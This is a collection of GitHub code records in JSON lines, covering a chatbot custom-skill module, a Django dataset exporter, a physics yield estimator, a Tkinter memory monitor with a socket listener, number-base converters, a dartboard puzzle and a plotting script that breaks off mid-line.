+{"seq_id":"71422785691","text":"import json\nfrom common.util import get_skill, join, split, skillable\nfrom time import asctime\n\ncustom = {}\ntry:\n with open('skills/custom/skills.json') as f:\n custom = json.load(f)\nexcept Exception:\n with open('skills/custom/skills.json', 'w+') as f:\n json.dump(custom, f, indent=2)\n\nskillDetails = '''[bcu]\"{name}\" details\n\n[cu]Output\n[c]{output}\n\n[cu]Created\n[c]{creation}\n\n[cu]Last modified\n[c]{modification}\n\n[cu]Author\n[c]<$@{author}$>\n'''\n\n@skillable\ndef run(data, context):\n '''\n Runs a custom skill.\n '''\n error = 'Custom skill not found'\n skill = context.sParams.lower()\n if skill not in custom.get(context.chatId, []):\n return {'message': error, 'replyTo': context.origin}\n result = custom[context.chatId][skill]['output']\n return {'message': result}\n\n@skillable\ndef learn(data, context):\n '''\n Learns a new custom skill.\n It saves the output of the skill as well as the nickname and details of the user who created it.\n '''\n syntaxError = \"Your custom skill's syntax is wrong.\"\n kiddoError = \"Don't get ahead of yourself, kiddo.\"\n temp = split(context.sParams, sep=',')\n if len(temp) < 2: \n return {'message': syntaxError, 'replyTo': context.origin}\n skill = temp[0].strip().lower()\n params = join(temp[1:], sep=',').strip()\n if params[0] == '$':\n return {'message': kiddoError, 'replyTo': context.origin}\n now = asctime()\n known = 're'\n if context.chatId not in custom:\n custom[context.chatId] = {}\n if skill not in custom[context.chatId]:\n known = ''\n custom[context.chatId][skill] = {\n 'creation': now\n }\n custom[context.chatId][skill].update({\n 'name': skill.capitalize(),\n 'output': params,\n 'author': context.author,\n 'authorId': context.authorId,\n 'modification': now\n })\n with open('skills/custom/skills.json', 'w+') as f:\n json.dump(custom, f, indent=2)\n result = f'The skill \"{skill}\" has just been {known}learnt.'\n return {'message': result, 'replyTo': context.origin}\n\n@skillable\ndef show(data, context):\n '''\n Lists all custom skills. If used with '-v', berbosity is added.\n '''\n isVerbose = context.sParams == '-v'\n result = '[BC]Custom skills' + (' (detailed)' if isVerbose else '') + '\\n\\n'\n temp = []\n for skill in custom.get(context.chatId, []):\n temp.append(f'- {skill}' + (f\": {custom[context.chatId][skill]['output']}\" if isVerbose else ''))\n if not temp:\n temp = '[CI]* No custom skills yet *'\n else:\n temp = join(sorted(temp), sep='\\n')\n result += temp\n return {'message': result}\n\n@skillable\ndef forget(data, context):\n '''\n Forgets a custom skill\n '''\n error = 'That custom skill does not exist.'\n skill = context.sParams.strip().lower()\n if skill not in custom.get(context.chatId, []):\n return {'message': error, 'replyTo': context.origin}\n custom[context.chatId].pop(skill)\n with open('skills/custom/skills.json', 'w+') as f:\n json.dump(custom, f, indent=2)\n result = f'The skill \"{skill}\" has been forgotten. You can rest in peace now.'\n return {'message': result}\n\n@skillable\ndef details(data, context):\n '''\n Shows the details of the skill and tags the user.\n '''\n error = 'That custom skill does not exist.'\n skill = context.sParams.strip().lower()\n if skill not in custom.get(context.chatId, []):\n return {'message': error, 'replyTo': context.origin}\n result = skillDetails.format(**custom[context.chatId][skill])\n return {'message': result, 'mentionUserIds': [custom[context.chatId][skill]['authorId']]}\n\nskills = {\n 'do': {\n 'desc': 'Runs a custom skill. Params: ',\n 'run': run\n },\n 'learn': {\n 'desc': 'Learns a custom skill. Usage: \\n[c]\"$learn , \"\"',\n 'run': learn\n },\n 'list': {\n 'desc': 'Lists custom skills. Optional param: -v',\n 'run': show\n },\n 'forget': {\n 'desc': 'Forgets a custom skill. Param: ',\n 'run': forget\n },\n 'skill-details': {\n 'desc': 'Tags the author of the custom skill. Param: ',\n 'run': details\n }\n}\n","repo_name":"fredrare/Antibot","sub_path":"skills/custom/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26088260997","text":"import sys\nsys.path.insert(1, './')\nimport django\nfrom django.conf import settings\nimport annotation_service.settings as app_settings\n\nsettings.configure(INSTALLED_APPS=app_settings.INSTALLED_APPS, DATABASES=app_settings.DATABASES)\ndjango.setup()\nfrom wf1.models import Claim\nfrom wf2.models import Label, ClaimState\nimport json, jsonlines\n\nprint(\"Running...\")\nused_pages = set()\nlabels = Label.objects.order_by(\"id\")\nused_hyperlinks = set()\n\nfor label in labels:\n used_pages.add(label.claim.page)\n used_pages.add(label.sentence.page)\n if not label.evidence:\n continue\n hyperlinks = label.evidence.hyperlinks.order_by(\"id\")\n sentences = label.evidence.sentences.order_by(\"id\")\n for hyperlink in hyperlinks:\n used_hyperlinks.add(hyperlink)\n for sentence in sentences:\n used_pages.add(sentence.page)\n\nnot_enough_info_claims = ClaimState.objects.filter(state=1).order_by(\"id\")\nfor not_enough_info_claim in not_enough_info_claims:\n used_pages.add(not_enough_info_claim.claim.page)\n\nwiki_pages = []\nfor used_page in used_pages:\n page = {\"id\": used_page.token, \"text\": used_page.page_content, \"lines\": \"\"}\n sentence_number = 0\n for sentence in used_page.sentences.order_by(\"id\"):\n page[\"lines\"] += f'{sentence_number}\\t{sentence.sentence_content}\\n'\n sentence_number += 1\n page[\"lines\"] += f'{sentence_number}\\t'\n wiki_pages.append(page)\n\nfor used_hyperlink in used_hyperlinks:\n hyperlink = {\"id\": f\"hyperlink_{used_hyperlink.token}\", \"text\": used_hyperlink.first_paragraph,\n \"lines\": f\"0\\t{used_hyperlink.first_paragraph}\\n1\\t\"}\n wiki_pages.append(hyperlink)\n\nwith open('wiki_pages.json', 'w', encoding='utf8') as f:\n json.dump(wiki_pages, f)\n\nwith jsonlines.open('wiki_pages.jsonl', mode='w') as writer:\n for wiki_page in wiki_pages:\n writer.write(wiki_page)\n\nprint(f'Number of used pages: {len(used_pages)}')\nprint(f'Number of used hyperlinks: {len(used_hyperlinks)}')\n\ndataset = []\nclaims = Claim.objects.order_by(\"id\")\nfor claim in claims:\n if len(claim.claim_state.all()) == 0:\n continue\n state = claim.claim_state.order_by(\"id\").first().state\n if state == 1:\n claim_json = {\"id\": claim.id, \"verifiable\": \"NOT VERIFIABLE\", \"label\": \"NOT ENOUGH INFO\",\n \"claim\": claim.claim_content, \"claim_page_id\": claim.page.id,\n \"claim_page_token\": claim.page.token,\n \"evidence\": [[[claim.page.id, None, None, None]]]}\n dataset.append(claim_json)\n elif state == 6:\n claim_json_supports = {\"id\": claim.id, \"verifiable\": \"VERIFIABLE\", \"label\": \"SUPPORTS\",\n \"claim\": claim.claim_content, \"claim_page_id\": claim.page.id,\n \"claim_page_token\": claim.page.token, \"evidence\": []}\n claim_json_refutes = {\"id\": claim.id, \"verifiable\": \"VERIFIABLE\", \"label\": \"REFUTES\",\n \"claim\": claim.claim_content, \"claim_page_id\": claim.page.id,\n \"claim_page_token\": claim.page.token, \"evidence\": []}\n supports = 0\n refutes = 0\n for label in claim.labels.order_by(\"id\"):\n evidences = [[claim.page.id, label.id, label.sentence.page.token,\n list(label.sentence.page.sentences.order_by(\"id\")).index(label.sentence)]]\n if label.evidence:\n for label_sentence in label.evidence.sentences.order_by(\"id\"):\n evidences.append([claim.page.id, label.id, label_sentence.page.token,\n list(label_sentence.page.sentences.order_by(\"id\")).index(label_sentence)])\n for label_hyperlink in label.evidence.hyperlinks.order_by(\"id\"):\n evidences.append([claim.page.id, label.id, f\"hyperlink_{label_hyperlink.token}\", 0])\n if label.label == 0:\n claim_json_supports[\"evidence\"].append(evidences)\n supports += 1\n else:\n claim_json_refutes[\"evidence\"].append(evidences)\n refutes += 1\n if supports > 0:\n dataset.append(claim_json_supports)\n if refutes > 0:\n dataset.append(claim_json_refutes)\n\nwith open('dataset.json', 'w', encoding='utf8') as f:\n json.dump(dataset, f)\n\nwith jsonlines.open('dataset.jsonl', mode='w') as writer:\n for label in dataset:\n writer.write(label)\n\nprint(f'Dataset length: {len(dataset)}')\nprint('Done!')\n","repo_name":"Zarharan/ParsFEVER","sub_path":"Tool/annotation_service/wf2/dataset_creator.py","file_name":"dataset_creator.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14408687006","text":"# Logging\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom StopsDilepton.analysis.Region import Region\nfrom StopsDilepton.tools.u_float import u_float\nfrom StopsDilepton.analysis.SystematicEstimator import SystematicEstimator\nfrom StopsDilepton.analysis.SetupHelpers import channels, trilepChannels\n\n\nclass MCBasedEstimate(SystematicEstimator):\n def __init__(self, name, sample, cacheDir=None):\n super(MCBasedEstimate, self).__init__(name, cacheDir=cacheDir)\n self.sample=sample\n # FastSim and 76X only for the MCBasedEstimate. Dirty. Looks whether one of the samples is fastsim.\n self.isFastSim = getattr(sample, \"isFastSim\", False) \n \n def _estimate(self, region, channel, setup):\n\n ''' Concrete implementation of abstract method 'estimate' as defined in Systematic\n '''\n\n logger.debug( \"MC prediction for %s channel %s\" %(self.name, channel) )\n\n if channel=='all':\n # 'all' is the total of all contributions\n return sum([self.cachedEstimate(region, c, setup) for c in (trilepChannels if setup.parameters['triLep'] else channels)])\n\n elif channel=='SF':\n # 'all' is the total of all contributions\n return sum([self.cachedEstimate(region, c, setup) for c in ['MuMu', 'EE']])\n\n else:\n preSelection = setup.preselection('MC', channel=channel, isFastSim = self.isFastSim)\n cut = \"&&\".join([region.cutString(setup.sys['selectionModifier']), preSelection['cut']])\n weight = preSelection['weightStr']\n\n logger.debug( \"Using cut %s and weight %s\"%(cut, weight) )\n return setup.lumi/1000.*u_float(**self.sample.getYieldFromDraw(selectionString = cut, weightString = weight) )\n","repo_name":"HephyAnalysisSW/StopsDilepton","sub_path":"analysis/python/MCBasedEstimate.py","file_name":"MCBasedEstimate.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42420125165","text":"\n##### Bibliotecas Utilizadas #####\n##################################\nimport socket\nfrom tkinter import *\nfrom threading import Thread\nimport threading\nimport time\nimport json\n##################################\n\n\"\"\"\ncreateVisualMemory\nFuncion encargada de crear los objetos\nque representan cada bloque de memoria\ndel vHeap, en funcion del tamaño de\ny de la divison.\n\n@author Fabian A. Solano Madriz\n@Param Size tamaño del vHeap\n@Param MemDivision tamaño de cada bloque de memoria\n\"\"\"\ndef createVisualMemory(Size,MemDivision):\n global MemoryBlockList,memoryCanvas,numMemoryBlocks\n \n def getMemBlocks(Size,MemDivision):\n result=Size/MemDivision\n if(isinstance(result,int)):\n return int(result)\n else:\n return int(result)+1\n\n\n numMemoryBlocks = getMemBlocks(Size,MemDivision) #Cantidad Total de Bloques\n MemoryChunckSize = (numMemoryBlocks*30) #Cantidad Total de Pixeles para todos los bloques\n HalfMemoryChunckSize = MemoryChunckSize/2 #Mita de la Cantidad total de Pixeles\n scrRegion=(0,0,400,MemoryChunckSize+(MemoryChunckSize*.005))#Region de Scroll\n #Total de Pixeles + un 0.005\n\n print(\"NUMERO DE BLOQUE DE MEMORIA \" + str(numMemoryBlocks))\n print(\"TAMAÑO DEL CANVAS DE MEMORIA \" + str(MemoryChunckSize))\n \n memoryCanvas = Canvas(window, width=300, height=600,borderwidth=0,\n highlightthickness=0,bg=\"#06072B\")\n\n memoryCanvas.config(scrollregion=scrRegion)\n memoryCanvas.pack(padx=1,pady=0)\n \n coordsInfo = [5,5,180,30,numMemoryBlocks] #Lista con Valores de Coordenadas(Cambian en cada iteracion)\n MemoryBlockList = [] #Lista de Bloques de Memoria (objetos Canvas)\n\n\n ##### Ciclo Dibujo de Bloques de Memoria ###################################################\n ############################################################################################\n iterator = 1;\n while coordsInfo[4] != 0: #Mientras que la cantidad de bloque sea != 0\n\n #Crea el bloque en las coordenadas correspondientes\n blockGUI = memoryCanvas.create_rectangle(coordsInfo[0],\n coordsInfo[1],\n coordsInfo[2],\n coordsInfo[3],width=0, fill=\"white\")\n block = [blockGUI,False]\n MemoryBlockList.append(block) #Añade el bloque creado a la lista\n coordsInfo[1] += 30 #Aumenta las coordenadas en 30\n coordsInfo[3] += 30\n coordsInfo[4] -= 1 #Reduce el numero de elementos crear\n \n porcentajeCompletado = (iterator*100)/numMemoryBlocks\n fillLoadingBars(porcentajeCompletado,MemDivision)\n iterator+=1\n ############################################################################################\n ################################# UI Elements ##############################################\n ############################################################################################\n memoryCanvas.place(x=15,y=3) #Coloca el canvas en posicion correcta\n hbar=Scrollbar(window,orient=VERTICAL) #Crea el scrollbar para el canvas\n hbar.pack(side=LEFT,fill=Y) #Coloca el scrollbar a la izquierda\n hbar.config(command=memoryCanvas.yview) #Añade el canvas al scrollbar\n memoryCanvas.config(yscrollcommand=hbar.set)#Añade el scrollbar al canvas\n loadScreen.destroy() #Destruye la ventana de carga\n\n global entry,TotalBar\n contenedor.create_text(505, 40, anchor=W, font=\"Arial\",text=\"Memory Usage\")\n contenedor2 = Canvas(window,width=250, height=400, bg=\"#06072B\")\n contenedor2.place(x=500,y=50)\n \n TotalBar = Canvas(window,width=240, height=390, bg=\"#FFFFFF\")\n TotalBar.place(x=505,y=55)\n\n for i in range(0,11):\n TotalBar.create_text(5, 370-(i*35), anchor=W, font=\"Arial\",text=str(i*10)+\"%\")\n\n botonA = Button(window,width=7,height=2,command=debugSetMemoryBlock,text=\"Change\",bg=\"#000000\",fg=\"#FFFFFF\")\n botonA.place(x=335,y=550)\n\n entry = Entry(window)\n entry.place(x=420,y=560)\n ############################################################################################\n\"\"\"\nsetMemoryBlock\nFuncion encargada de actualizar el\nvalor de n bloques de memoria. Ya sea\nque se encuentra algun datos almacenado\no que el bloque se encuentra libre\n\n@author Fabian A. Solano Madriz\n@Param pUsageFlag Indica si hay un dato almacenado\n@Param pStart posicion inicial de bloque a actualizar\n@Param pEnd posicion final de bloque a actualizar\n\"\"\"\ndef setMemoryBlock(pUsageFlag,pStart,pEnd):\n global MemoryBlockList,memoryCanvas,entry\n if(pUsageFlag == True):\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"red\")\n MemoryBlockList[i][1] = True\n else:\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"white\")\n MemoryBlockList[i][1] = False\n setMemoryGraphicBar()\n \ndef debugSetMemoryBlock():\n global MemoryBlockList,memoryCanvas,entry\n data = entry.get()\n data= data.split(\"#\")\n pStart = int(data[1])\n pEnd = int(data[2])\n \n if(data[0] == \"True\"):\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"red\")\n MemoryBlockList[i][1] = True\n else:\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"white\")\n MemoryBlockList[i][1] = False\n entry.delete(0, 'end')\n setMemoryGraphicBar()\n \ndef setMemoryGraphicBar():\n \n global MemoryBlockList,numMemoryBlocks,TotalBar\n blocksUsed = 0\n for i in range(0,len(MemoryBlockList)):\n if(MemoryBlockList[i][1] == True):\n blocksUsed+=1\n \n porcentajeCompletado = (blocksUsed*100)/numMemoryBlocks\n print(\"Porcentaje: \" + str(porcentajeCompletado))\n\n Pos = 370-((porcentajeCompletado*350)/100)\n print(\"Posicion: \" + str(Pos))\n TotalBar.delete(\"Bar\")\n TotalBar.create_rectangle(75,380,150,Pos,width=0, fill=\"green\",tags=\"Bar\")\n print(\"FINISHED\")\ndef createGUI(Size,MemDivision):\n x= Thread(target=createVisualMemory, args=(Size,MemDivision))\n x.daemon = True\n x.start()\n \ndef manageData(pData):\n global xStart\n pData = pData.split(\"#\")\n if(xStart == False):\n xStart = True\n if(pData[0] == \"xStart\"):\n startViewer(int(pData[1]),int(pData[2]))\n if(pData[0] == \"true\"):\n setMemoryBlock(True,int(pData[1]),int(pData[2]))\n \n \n \ndef start_HOST():\n global server\n HOST = \"\"\n PORT = 7070\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n server.bind((\"\", PORT))\n except socket.error as msg:\n print (('Failed to create socket. Error code: ' + str(msg[0]) +\n ' , Error message : ' + msg[1]))\n\n server.listen(10)\n print(\"Now Listening\")\n \ndef listen():\n while True:\n conn, addr = server.accept()\n while True:\n data = conn.recv(4096)\n data = data.decode(\"utf-8\")\n \n if(data != \"\"):\n print(data)\n manageData(data)\n #time.sleep()\n server.close()\n\n\ndef start_loop():\n a= Thread(target=listen, args=())\n a.daemon = True\n a.start()\n\n\n#############################################################################\n####################### Graphical User Interface ############################\n#############################################################################\n\n\n######################## Loading Screen ##############################\ndef fillLoadingBars(ptr,numMemBlocks):\n #print(\"PORCENTAJE \" + str(ptr))\n bloque = int(ptr*20/100)\n #print(\"Bloque: \" + str(bloque))\n for i in range(0,bloque):\n loadCanvas.itemconfig(loadBar[i],fill=\"green\")\n splashCanvas.itemconfig(txtPercentaje,text=str(int(ptr))+\"%\")\n if(ptr==100):\n window.deiconify()\ndef start_LoadBar():\n global loadScreen,splashCanvas\n loadScreen = Toplevel()\n loadScreen.title(\"Memory Monitor LDMM\")\n loadScreen.geometry(\"500x200+450+250\")\n loadScreen.resizable(width=FALSE, height=FALSE)\n\n splashCanvas = Canvas(loadScreen, width=500, height=200, bg=\"#FFFFFF\")\n splashCanvas.place(x=0,y=0)\n\n global loadCanvas,loadBar,txtPercentaje\n\n splashCanvas.create_text(20, 70, anchor=W, font=\"Arial\",text=\"Percentage:\")\n txtPercentaje = splashCanvas.create_text(115, 70, anchor=W, font=\"Arial\",text=\"0\")\n \n loadBar=[]\n loadCanvas = Canvas(splashCanvas, width=400, height=50, bg=\"#000000\")\n loadCanvas.place(x=50,y=90)\n c=[1,1,20,50] #Coordenas de Creacion de Barras de Carga\n for i in range(0,20):\n ob = loadCanvas.create_rectangle(c[0],c[1],c[2],c[3],width=0, fill=\"white\")\n c[0]+=20\n c[2]+=20\n loadBar.append(ob)\n loadScreen.withdraw()\ndef startViewer(vHeapSize,MemDivision):\n loadScreen.deiconify()\n createGUI(vHeapSize,MemDivision)\n window.withdraw()\n\n#################################################################################\n############################## Initial Setup ####################################\n#################################################################################\n\nglobal window,contenedor,xStart\nwindow = Tk()\nwindow.title(\"Memory Monitor LDMM\")\nwindow.geometry(\"800x600+250+100\")\nwindow.resizable(width=TRUE, height=FALSE)\n\nxStart = False\n\ncontenedor = Canvas(window, width=800, height=600, bg=\"#A8A79E\")\ncontenedor.place(x=0,y=0)\n\n\n\n\n\nstart_LoadBar()\nstart_HOST()\nstart_loop()\nwindow.mainloop()\n","repo_name":"dutsuwak/lightweight-memory-manager","sub_path":"src/com.LDMM.GUI/MemMonitor.py","file_name":"MemMonitor.py","file_ext":"py","file_size_in_byte":9804,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22102646705","text":"from colr import Colr as colr\nfrom time import sleep as sleep\n\n\nclass Colors:\n def red(self):\n print(colr().hex(\"#ff0000\", self, rgb_mode=True))\n\n def rose(self):\n print(colr().hex(\"#ff0066\", self, rgb_mode=True))\n\n def green(self):\n print(colr().hex(\"#00ff8d\", self, rgb_mode=True))\n\n def gnome_green(self):\n print(colr().hex(\"#2ed1b4\", self, rgb_mode=True))\n\n def dark_orange(self):\n print(colr().hex(\"#cf301b\", self, rgb_mode=True))\n\n def light_gnome(self):\n print(colr().hex(\"#00ffc4\", self, rgb_mode=True))\n\n def yellow_green(self):\n print(colr().hex(\"#7ed666\", self, rgb_mode=True))\n\n def violet(self):\n print(colr().hex(\"#cc33ff\", self, rgb_mode=True))\n\n def light_green(self):\n print(colr().hex(\"#21ff00\", self, rgb_mode=True))\n\n def orange(self):\n print(colr().hex(\"#ff8e35\", self, rgb_mode=True))\n\n def yellow(self):\n print(colr().hex(\"#fff300\", self, rgb_mode=True))\n\n def sky_blue(self):\n print(colr().hex(\"#00ccff\", self, rgb_mode=True))\n\n def blue(self):\n print(colr().hex(\"#0000ff\", self, rgb_mode=True))\n\n def cream(self):\n print(colr().hex(\"#ff9999\", self, rgb_mode=True))\n\n def dark_rose(self):\n print(colr().hex(\"#cc0066\", self, rgb_mode=True))\n\n def dark_red(self):\n print(colr().hex(\"#cc0000\", self, rgb_mode=True))\n\n def dark_green(self):\n print(colr().hex(\"#009933\", self, rgb_mode=True))\n\n def light_blue(self):\n print(colr().hex(\"#6666ff\", self, rgb_mode=True))\n\n\nclass Style:\n null = \"\"\n dash = null.center(58, \"-\")\n\n\nclass Operator:\n def exit():\n Colors.red(\"\\n You exited\")\n\n def invalid():\n print(\n colr().hex(\n \"#ff8e35\",\n \"\"\" (__) \n (oo) \n /------\\/ \n / | || \n * /\\---/\\ \n ~~ ~~ \n \"\"\",\n rgb_mode=True,\n ),\n colr().hex(\"#ff0000\", \"...invalid input...\", rgb_mode=True),\n )\n\n\nclass Methods:\n def octal_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter octal number: \")\n octal = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n try:\n octal_digits = list(map(int, str(octal)))\n binary_digits = [format(digit, \"03b\") for digit in octal_digits]\n binary_result = \"\".join(binary_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_result})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \" Error: Invalid octal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_to_octal():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n show_decimal = decimal_number\n try:\n decimal_number = int(decimal_number)\n if decimal_number == 0:\n Colors.red(\n \"0\" # Special case for input 0, as its octal representation is also 0\n )\n\n octal_digits = []\n while decimal_number > 0:\n quotient, remainder = divmod(decimal_number, 8)\n octal_digits.insert(\n 0, str(remainder)\n ) # Insert the remainder at the beginning of the list\n decimal_number = quotient\n\n octal_result = \"\".join(octal_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n octal = f\" ({octal_result})8\"\n Colors.red(f\"{octal.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_to_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n decimal_number = int(decimal_number)\n try:\n if decimal_number == 0:\n Colors.red(\n \"0\" # Special case for input 0, as its octal representation is also 0\n )\n binary_digits = []\n while decimal_number > 0:\n quotient, remainder = divmod(decimal_number, 2)\n binary_digits.insert(\n 0, str(remainder)\n ) # Insert the remainder at the beginning of the list\n decimal_number = quotient\n\n binary_result = \"\".join(binary_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_result})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def binary_to_decimal():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter binary value : \")\n binary_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n try:\n decimal_number = 0\n\n # Iterate over the binary digits in reverse order\n for i, bit in enumerate(reversed(binary_number)):\n if bit == \"1\":\n decimal_number += 2**i\n\n decimal_result = str(decimal_number)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n decimal = f\" ({decimal_result})2\"\n Colors.red(f\"{decimal.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid binary input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_to_hexadecimal():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n try:\n decimal_number = int(decimal_number)\n if decimal_number == 0:\n Colors.red(\n \"0\" # Special case for input 0, as its octal representation is also 0\n )\n hex_digits = \"0123456789ABCDEF\"\n hexadecimal_string = \"\"\n\n while decimal_number > 0:\n remainder = decimal_number % 16\n hexadecimal_string = hex_digits[remainder] + hexadecimal_string\n decimal_number //= 16\n Colors.light_blue(\"\\n\" + \" \" + dash)\n hexadecimal = f\" ({hexadecimal_string})16\"\n Colors.red(f\"{hexadecimal.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def hex_to_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter hexadecimal number: \")\n hex_string = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n hex_string = hex_string.upper()\n try:\n hex_digits = \"0123456789ABCDEF\"\n binary_digits = [\n bin(hex_digits.index(digit))[2:].zfill(4) for digit in hex_string\n ]\n binary_string = \"\".join(binary_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_string})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid hexadecimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_float_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_fraction = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n decimal_fraction = float(decimal_fraction)\n try:\n integral_part = int(decimal_fraction)\n fractional_part = decimal_fraction - integral_part\n\n integral_binary = bin(integral_part)[2:]\n\n fractional_binary = \"\"\n while fractional_part > 0:\n fractional_part *= 2\n bit = int(fractional_part)\n fractional_binary += str(bit)\n fractional_part -= bit\n binary_string = f\"{integral_binary}.{fractional_binary}\"\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_string})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid float decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n","repo_name":"AbhiJohnv/Converter","sub_path":"class_def.py","file_name":"class_def.py","file_ext":"py","file_size_in_byte":9741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30077743327","text":"\"\"\"\r\n\n\nCreate a function which creates a square dartboard of side length `n`. The\nvalue of a number should increase, the closer it is to the centre of the\nboard.\n\n### Examples\n\n make_dartboard(3) ➞ [\n 111,\n 121,\n 111\n ]\n \n make_dartboard(8) ➞ [\n 11111111,\n 12222221,\n 12333321,\n 12344321,\n 12344321,\n 12333321,\n 12222221,\n 11111111\n ]\n \n make_dartboard(5) ➞ [\n 11111,\n 12221,\n 12321,\n 12221,\n 11111\n ]\n\n### Notes\n\nIf the size given is an even number, the centre should be made up of the 4\nhighest values.\n\n\"\"\"\r\n\ndef make_dartboard(n):\n m = n // 2 + n % 2\n s = [\"1\" * m]\n for i in range(1, m):\n add = s[-1][: i] + (m - i) * str(i + 1)\n s.append(add)\n if n % 2 == 1:\n s = [i[:-1] + i[::-1] for i in s]\n s = s[:-1] + s[::-1]\n else: \n s = [i + i[::-1] for i in s]\n s = s + s[::-1]\n return [int(i) for i in s]\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"Kv8DMmwfuKTLyZD5E_15.py","file_name":"Kv8DMmwfuKTLyZD5E_15.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72040011930","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 3 11:57:53 2018\n\n@author: aparnami\n\"\"\"\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nroute=\"F34toOldCon\"\nroot = os.path.join(os.curdir, \"Models\", route)\n\nfile_alldays = 'residue_alldays.csv'\nfile_weekdays = 'residue_weekdays.csv'\n\nresidue_alldays = pd.read_csv(os.path.join(root, file_alldays), header=None, index_col=None)\nresidue_alldays = np.reshape(residue_alldays.values, (-1,1))\n\nresidue_weekdays = pd.read_csv(os.path.join(root, file_weekdays), header=None, index_col=None)\nresidue_weekdays = np.reshape(residue_weekdays.values, (-1,1))\n\n#Visualize the results\nintervals = int(24 * 60 / 5)\ntime_labels = []\nk = []\nfor i in range(intervals):\n if (i+1) % 12 == 0:\n h = int((i+1) / 12)\n time_str = '{:02d}:00'.format(h)\n time_labels.append(time_str)\n k.append(i)\n\nplt.figure()\nplt.plot(residue_alldays, color = 'cyan', label='Residue All Days')\nplt.plot(residue_weekdays, color = 'blue', label='Residue Weekdays')\nplt.title('Residue Plots')\nplt.xlabel('Clock')\nplt.ylabel('Time(s)')\nplt.xticks(k,time_labels,fontsize=7)\n\nplt.legend()\nplt.show()\n\nx = range(intervals)\ny1 = residue_alldays[:,0]\ny2 = residue_weekdays[:,0]\nfig, ax = plt.subplots(1, 1, sharex=True)\n#ax.plot(x, y1, x, y2, color='black')\nax.plot(x, 